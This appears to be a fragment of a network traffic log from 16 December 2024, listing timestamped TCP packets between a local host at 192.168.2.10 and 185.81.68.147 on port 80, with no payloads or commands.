                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.619369984 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.620058060 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.620078087 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.620198011 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.620901108 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.621043921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.621146917 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.621882915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.622046947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.622138023 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.622661114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.622833967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.622922897 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.623613119 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.623626947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.623742104 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.624382019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.624533892 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.624628067 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.625322104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.625477076 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.625572920 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.626286983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.626302958 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.626419067 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.627367020 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.627522945 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.627619982 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.628011942 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.628205061 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.628298044 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.628953934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.629128933 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.629219055 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.629719973 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.629740953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.629849911 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.630675077 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.630692959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.630779028 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.630804062 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.630847931 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.631109953 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.631572962 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.631707907 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.631793976 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.632462978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.632615089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.632700920 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.633343935 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.633445024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.633537054 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.634226084 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.634337902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.634423971 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.635076046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.635169029 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.635253906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.635988951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.636174917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.636260033 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.636966944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.637032032 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.637128115 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.637748957 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.637830019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.637952089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.638644934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.638721943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.638838053 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.639462948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.639658928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.639772892 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.640337944 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.640479088 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.640593052 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.641201019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.641326904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.641419888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.642076015 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.656467915 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.656572104 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.656717062 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.656737089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.656855106 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.656908035 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.657717943 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.657821894 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.657847881 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.658514977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.658557892 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.658633947 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.659406900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.659425974 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.659447908 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.659584999 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.659672976 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.659710884 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.660418987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.660541058 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.660583973 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.800283909 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.800353050 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.800493956 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.800642967 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.800755978 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.800796986 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.801493883 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.801618099 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.801662922 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.802417994 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.802531004 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.803263903 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.803371906 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.803410053 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.804145098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.804249048 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.804266930 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.804300070 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.804994106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.805043936 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.805135965 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.805891991 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.805993080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.806082010 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.806780100 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.806910038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.807018995 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.807672024 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.807832956 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.807940960 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.808537006 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.808610916 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.809386969 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.809489965 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.809567928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.810430050 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.810462952 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.810528040 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.810545921 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.811198950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.811376095 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.811458111 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.812004089 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.812108040 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.812181950 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.812905073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.813009977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.813095093 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.813772917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.813865900 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.814040899 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.814701080 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.814845085 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.815627098 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.815710068 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.815781116 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.816601038 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.816663027 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.816693068 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.816715002 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.817265034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.817379951 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.817473888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.818150043 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.818274975 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.818372965 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.819056034 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.819175005 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.819258928 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.819922924 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.819977045 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.820090055 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.820889950 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.821048021 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.821151018 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.821683884 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.821790934 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.821898937 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.822576046 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.822702885 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.822803974 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.823396921 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.823523998 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.823611975 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.824292898 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.824408054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.824517012 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.825165987 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.825249910 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.825297117 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.826040030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.826147079 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.826258898 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.826905012 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.827035904 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.827537060 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.827821016 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.827945948 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.828031063 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.828692913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.828752041 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.828835964 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.829554081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.829673052 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.829766035 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.830557108 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.830657959 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.830740929 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.831334114 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.831475019 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.831562996 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.832187891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.832211971 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.832283020 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.833040953 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.833170891 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.833256006 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.833939075 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.834141970 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.834216118 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.834891081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.834999084 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.835077047 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.835937977 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.836066008 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.836149931 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.836553097 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.836587906 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.836669922 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.837462902 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.837596893 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.837673903 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.838316917 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.838449001 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.838531017 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.839307070 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.839402914 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.839490891 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.840074062 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.848011017 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.848073959 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.848090887 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.848452091 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.848509073 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.848512888 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.849127054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.849184036 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.849186897 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.850044966 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.850102901 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.850130081 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.850903988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.850965977 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.851129055 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.851766109 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.851820946 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.851861954 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.852628946 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.852673054 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.852679968 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.902784109 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.992578030 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.992667913 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.992762089 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.992964983 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.993035078 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.993122101 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.993916988 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.993983984 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.994071960 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.994846106 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.994860888 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.994957924 CET4972380192.168.2.10185.81.68.147
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.995662928 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.995867014 CET8049723185.81.68.147192.168.2.10
                                                                                                                                                                                                                                Dec 16, 2024 10:42:55.995955944 CET4972380192.168.2.10185.81.68.147
